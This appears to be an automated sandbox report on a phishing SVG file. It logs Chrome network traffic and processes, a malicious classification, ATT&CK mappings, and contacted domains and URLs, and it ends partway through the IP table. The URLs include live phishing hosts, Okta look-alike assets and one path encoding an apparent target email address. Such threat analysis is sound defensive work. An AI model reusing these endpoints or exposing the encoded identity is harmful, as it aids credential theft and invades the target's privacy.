                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.16:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.16:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.16:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.16:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.16:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49779 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49784 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6376_2030608955
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6376_2030608955
                Source: classification engineClassification label: mal100.phis.evad.winSVG@20/32@34/225
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Qvc_Audio-Play.0044.svg
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,10220445616939681397,10491532764567568754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,10220445616939681397,10491532764567568754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.11..script.csv, type: HTML
                Source: Yara matchFile source: 1.12..script.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid AccountsWindows Management Instrumentation1
                Browser Extensions                		1
                Process Injection                		12
                Masquerading                		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting                		1
                Extra Window Memory Injection                		1
                Process Injection                		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                File Deletion                		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                Ingress Tool Transfer                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Extra Window Memory Injection                		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                Screenshots

                Download Video

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29t0%Avira URL Cloudsafe
                https://a.nel.cloudflare.com/report/v4?s=ed5L1%2FLysQ8gJoqySpy0a4hGi%2FZ5xg33ouiM3hZ39BGpxd%2FHLx%2F%2FjKh5%2BJuypDGrEA1gQna0kDWgGGV2Ar0%2BeMHPbwnsFUej%2B95OiUMocL%2BEoC3ZBTWnu69Ydb%2BRhfUx5qB90%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/favicon.ico0%Avira URL Cloudsafe
                https://m60ri.kdyukk.ru/kabutar@b3o9bss80%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUY0%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/nmZcEpqVzbN0D7DR1eriuX5be3DrmWrTAkIjw50%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/xyixa12teRvw6EcgFJBfEmmpisc51Ykqwg5ZTjQYHgVGrxljy0%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/34r0UWURcdqG6589180%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/GDSherpa-regular.woff20%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/GDSherpa-vf2.woff20%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/qrkpOyjOiDunHXziFGZrOWjZdbTejVnEICa8M12dnySKzi2ytGQDXno0L7zv5Gw0Rcd2400%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/yzQ7WQ1WS103WLJUON9XEhz9rsLHCpu997FrOW4sdEIKab1800%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/GDSherpa-regular.woff0%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/qrRFwXbevZEvnVMAiUx7UvsVvR0ghZ3dwRujkZwN451370%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/wxnYfqODAqON352foJK6CCE9kK3PljnLopsxN1ximawy4Kzj8eL121290%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/vsa63gyXm8VR7xw3vpJZf7iHjG0DeGF4HB3ynikxXywlJfvOycsuvRsyF9WKYQq1gc5Fcm0%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/opaoRhBjUgHiIoaCKfIezzzWoVkJqtK30HJghd3t16wd98Kwq3Lsex6f6R62cd1970%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/ijjoQp1oxSOnXEcvEdrNB8yaA6DF8mn5FECCpjHp1oZF4pjgrN122050%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/uvYNdT4TjRgRLErGCQMLf6xakoKmlmnqkwEY7rIwL97aNffM1Fw7tSWolcDFXUWbBYAHef2550%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/mnKYewUy2Erp7R0vU2rSXaMo7Cq7klTDYuB2MBcvhu2iC2jn901450%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/klnbyrX5mgR6oOR29lBToSlNE2NGVwxkoZOideivFRicbZu8Yg561700%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/klsu6d3zoH5wmy0peV2uToNijTGSfrLunny4LgpAlT3rGpdJZIfwx2140%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/GDSherpa-bold.woff0%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/GDSherpa-vf.woff20%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/ijskoldCggu31f20b0CIcq30AhAYsKJqrz8ih0T8qdNzvqPbAxgvsbYab2300%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/abtGFSFdrsecd300%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/GDSherpa-bold.woff20%Avira URL Cloudsafe
                https://gt.prjnyvhqq.es/34fDlhbhAZQZgS98w6PXi3wgh9MhxLvtFGDDs891050%Avira URL Cloudsafe
                https://a.nel.cloudflare.com/report/v4?s=oOj4O1XvUmoVXMNVIfGL4eQTRDAgJ5LhfrUitS%2Bkxr7Xb0WHAfdvGm4Ydd4Ji3AAjlN%2B1lp4s9a23vNaFZQJBBuHRUQOQPAtLhfuchdPRHRgNx1%2FssyJpJGpJubTj%2Fy3rZS90%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                to07jtdrnkvvlfixseyblmkqfso2yre7fyuwqvz80dw95wnkqakicr.freyaxw.es
                		104.21.64.1
                		truefalse
                  		unknown
                  a.nel.cloudflare.com
                  		35.190.80.1
                  		truefalse
                    		high
                    m60ri.kdyukk.ru
                    		104.21.84.180
                    		truefalse
                      		unknown
                      code.jquery.com
                      		151.101.66.137
                      		truefalse
                        		high
                        cdnjs.cloudflare.com
                        		104.17.24.14
                        		truefalse
                          		high
                          github.com
                          		140.82.112.3
                          		truefalse
                            		high
                            get.geojs.io
                            		104.26.1.100
                            		truefalse
                              		high
                              www.google.com
                              		142.251.40.196
                              		truefalse
                                		high
                                d19d360lklgih4.cloudfront.net
                                		18.164.124.11
                                		truefalse
                                  		high
                                  gt.prjnyvhqq.es
                                  		104.21.80.1
                                  		truetrue
                                    		unknown
                                    objects.githubusercontent.com
                                    		185.199.110.133
                                    		truefalse
                                      		high
                                      ok4static.oktacdn.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                          		high
                                          https://gt.prjnyvhqq.es/GDSherpa-regular.woff2false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://a.nel.cloudflare.com/report/v4?s=oOj4O1XvUmoVXMNVIfGL4eQTRDAgJ5LhfrUitS%2Bkxr7Xb0WHAfdvGm4Ydd4Ji3AAjlN%2B1lp4s9a23vNaFZQJBBuHRUQOQPAtLhfuchdPRHRgNx1%2FssyJpJGpJubTj%2Fy3rZS9false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                            		high
                                            https://gt.prjnyvhqq.es/qrRFwXbevZEvnVMAiUx7UvsVvR0ghZ3dwRujkZwN45137false
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                              		high
                                              https://gt.prjnyvhqq.es/ijjoQp1oxSOnXEcvEdrNB8yaA6DF8mn5FECCpjHp1oZF4pjgrN12205false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gt.prjnyvhqq.es/GDSherpa-vf2.woff2false
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                		high
                                                https://gt.prjnyvhqq.es/vsa63gyXm8VR7xw3vpJZf7iHjG0DeGF4HB3ynikxXywlJfvOycsuvRsyF9WKYQq1gc5Fcmfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/qrkpOyjOiDunHXziFGZrOWjZdbTejVnEICa8M12dnySKzi2ytGQDXno0L7zv5Gw0Rcd240false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://m60ri.kdyukk.ru/kabutar@b3o9bss8false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/opaoRhBjUgHiIoaCKfIezzzWoVkJqtK30HJghd3t16wd98Kwq3Lsex6f6R62cd197false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/GDSherpa-regular.wofffalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/yzQ7WQ1WS103WLJUON9XEhz9rsLHCpu997FrOW4sdEIKab180false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/nmZcEpqVzbN0D7DR1eriuX5be3DrmWrTAkIjw5false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/wxnYfqODAqON352foJK6CCE9kK3PljnLopsxN1ximawy4Kzj8eL12129false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/mnKYewUy2Erp7R0vU2rSXaMo7Cq7klTDYuB2MBcvhu2iC2jn90145false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/klnbyrX5mgR6oOR29lBToSlNE2NGVwxkoZOideivFRicbZu8Yg56170false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://gt.prjnyvhqq.es/uvYNdT4TjRgRLErGCQMLf6xakoKmlmnqkwEY7rIwL97aNffM1Fw7tSWolcDFXUWbBYAHef255false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                  		high
                                                  https://a.nel.cloudflare.com/report/v4?s=ed5L1%2FLysQ8gJoqySpy0a4hGi%2FZ5xg33ouiM3hZ39BGpxd%2FHLx%2F%2FjKh5%2BJuypDGrEA1gQna0kDWgGGV2Ar0%2BeMHPbwnsFUej%2B95OiUMocL%2BEoC3ZBTWnu69Ydb%2BRhfUx5qB9false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/GDSherpa-bold.woff2false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/GDSherpa-vf.woff2false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/xyixa12teRvw6EcgFJBfEmmpisc51Ykqwg5ZTjQYHgVGrxljyfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/abtGFSFdrsecd30false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/klsu6d3zoH5wmy0peV2uToNijTGSfrLunny4LgpAlT3rGpdJZIfwx214false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/GDSherpa-bold.wofffalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/34fDlhbhAZQZgS98w6PXi3wgh9MhxLvtFGDDs89105false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://gt.prjnyvhqq.es/ijskoldCggu31f20b0CIcq30AhAYsKJqrz8ih0T8qdNzvqPbAxgvsbYab230false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://get.geojs.io/v1/ip/geo.jsonfalse
                                                    		high
                                                    https://gt.prjnyvhqq.es/favicon.icofalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://gt.prjnyvhqq.es/34r0UWURcdqG658918false
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    140.82.112.3
                                                    		github.comUnited States
                                                    		36459GITHUBUSfalse
                                                    104.26.1.100
                                                    		get.geojs.ioUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.250.176.206
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    104.21.64.1
                                                    		to07jtdrnkvvlfixseyblmkqfso2yre7fyuwqvz80dw95wnkqakicr.freyaxw.esUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    104.21.80.1
                                                    		gt.prjnyvhqq.esUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    104.21.96.1
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    142.251.40.196
                                                    		www.google.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    142.251.40.174
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    151.101.66.137
                                                    		code.jquery.comUnited States
                                                    		54113FASTLYUSfalse
                                                    18.164.124.11
                                                    		d19d360lklgih4.cloudfront.netUnited States
                                                    		3MIT-GATEWAYSUSfalse
                                                    35.190.80.1
                                                    		a.nel.cloudflare.comUnited States
                                                    		15169GOOGLEUSfalse
                                                    185.199.110.133
                                                    		objects.githubusercontent.comNetherlands
                                                    		54113FASTLYUSfalse
                                                    104.17.24.14
                                                    		cdnjs.cloudflare.comUnited States
